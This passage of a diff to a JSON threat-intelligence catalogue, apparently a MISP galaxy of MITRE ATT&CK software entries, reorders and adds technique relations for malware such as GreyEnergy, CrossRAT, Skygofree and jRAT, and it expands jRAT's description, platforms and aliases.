"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7d751199-05fa-4a72-920f-85df4506c76c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "308b3d68-a084-4dfb-885a-3125e1a9c1e8", + "value": "GreyEnergy - S0342" + }, { "description": "[CrossRAT](https://attack.mitre.org/software/S0235) is a cross platform RAT.", "meta": { @@ -18706,13 +21158,6 @@ ] }, "related": [ - { - "dest-uuid": "dd901512-6e37-4155-943b-453e3777b125", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ @@ -18721,7 +21166,7 @@ "type": "uses" }, { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "dest-uuid": "dd901512-6e37-4155-943b-453e3777b125", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -18733,6 +21178,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "a5e91d50-24fa-44ec-9894-39a88f658cea", @@ -18755,21 +21207,7 @@ }, "related": [ { - "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -18782,20 +21220,6 @@ ], "type": "uses" }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ @@ -18816,6 +21240,34 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "60d50676-459a-47dd-92e9-a827a9fe9c58", @@ -18838,14 +21290,14 @@ }, "related": [ { - "dest-uuid": "f981d199-2720-467e-9dc9-eea04dbe05cf", + "dest-uuid": "6c49d50f-494d-4150-b774-a655022d20a6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "6c49d50f-494d-4150-b774-a655022d20a6", + "dest-uuid": "f981d199-2720-467e-9dc9-eea04dbe05cf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -18871,13 +21323,6 @@ ] }, "related": [ - { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ @@ -18885,97 +21330,6 @@ ], "type": "uses" }, - { - "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ @@ -18983,12 +21337,110 @@ ], "type": "uses" }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "7ba0fc46-197d-466d-8b9f-f1c64d5d81e5", @@ -19011,21 +21463,7 @@ }, "related": [ { - "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "53263a67-075e-48fa-974b-91c5b5445db7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "dest-uuid": "8f0e39c6-82c9-41ec-9f93-5696c0f2e274", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -19038,6 +21476,13 @@ ], "type": "uses" }, + { + "dest-uuid": "d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "89fcd02f-62dc-40b9-a54b-9ac4b1baef05", "tags": [ @@ -19060,7 +21505,14 @@ "type": "uses" }, { - "dest-uuid": "8f0e39c6-82c9-41ec-9f93-5696c0f2e274", + "dest-uuid": "53263a67-075e-48fa-974b-91c5b5445db7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -19087,42 +21539,7 @@ }, "related": [ { - "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -19135,48 +21552,6 @@ ], "type": "uses" }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "519630c5-f03f-4882-825c-3af924935817", "tags": [ @@ -19185,21 +21560,7 @@ "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -19213,7 +21574,49 @@ "type": "uses" }, { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -19226,12 +21629,61 @@ ], "type": "uses" }, + { + "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "c2417bab-3189-4d4d-9d60-96de2cdaf0ab", @@ -19254,7 +21706,7 @@ }, "related": [ { - "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -19268,7 +21720,35 @@ "type": "uses" }, { - "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1b7ba276-eedc-4951-a762-0ceea2c030ec", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -19289,63 +21769,7 @@ "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1b7ba276-eedc-4951-a762-0ceea2c030ec", + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -19359,14 +21783,35 @@ "type": "uses" }, { - "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -19378,6 +21823,20 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "1d1fce2f-0db5-402b-9843-4278a0694637", @@ -19399,13 +21858,6 @@ ] }, "related": [ - { - "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ @@ -19420,6 +21872,13 @@ ], "type": "uses" }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ @@ -19455,14 +21914,7 @@ }, "related": [ { - "dest-uuid": "6c49d50f-494d-4150-b774-a655022d20a6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "dest-uuid": "b3c2e5de-0941-4b57-ba61-af029eb5517a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -19475,6 +21927,13 @@ ], "type": "uses" }, + { + "dest-uuid": "702055ac-4e54-4ae9-9527-e23a38e0b160", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "6a3f6490-9c44-40de-b059-e5940f246673", "tags": [ @@ -19483,14 +21942,14 @@ "type": "uses" }, { - "dest-uuid": "b3c2e5de-0941-4b57-ba61-af029eb5517a", + "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "702055ac-4e54-4ae9-9527-e23a38e0b160", + "dest-uuid": "6c49d50f-494d-4150-b774-a655022d20a6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -19501,31 +21960,35 @@ "value": "Skygofree - S0327" }, { - "description": "[jRAT](https://attack.mitre.org/software/S0283) is a cross-platform remote access tool that was first observed in November 2017. (Citation: jRAT Symantec Aug 2018)", + "description": "[jRAT](https://attack.mitre.org/software/S0283) is a cross-platform, Java-based backdoor originally available for purchase in 2012. Variants of [jRAT](https://attack.mitre.org/software/S0283) have been distributed via a software-as-a-service platform, similar to an online subscription model.(Citation: Kaspersky Adwind Feb 2016) (Citation: jRAT Symantec Aug 2018)", "meta": { "external_id": "S0283", "mitre_platforms": [ "Linux", "Windows", - "macOS" + "macOS", + "Android" ], "refs": [ "https://attack.mitre.org/software/S0283", - "https://www.symantec.com/blogs/threat-intelligence/jrat-new-anti-parsing-techniques" + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07195002/KL_AdwindPublicReport_2016.pdf", + "https://www.symantec.com/blogs/threat-intelligence/jrat-new-anti-parsing-techniques", + "https://s3.eu-west-1.amazonaws.com/ncsc-content/files/Joint%20report%20on%20publicly%20available%20hacking%20tools%20%28NCSC%29.pdf" ], "synonyms": [ "jRAT", + "JSocket", + "AlienSpy", + "Frutas", + "Sockrat", + "Unrecom", + "jFrutas", + "Adwind", + "jBiFrost", "Trojan.Maljava" ] }, "related": [ - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", "tags": [ @@ -19534,14 +21997,14 @@ "type": "uses" }, { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -19561,6 +22024,13 @@ ], "type": "uses" }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ @@ -19574,6 +22044,132 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2ba5aa71-9d15-4b22-b726-56af06d9ad2f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56ff457d-5e39-492b-974c-dfd2b8603ffe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": 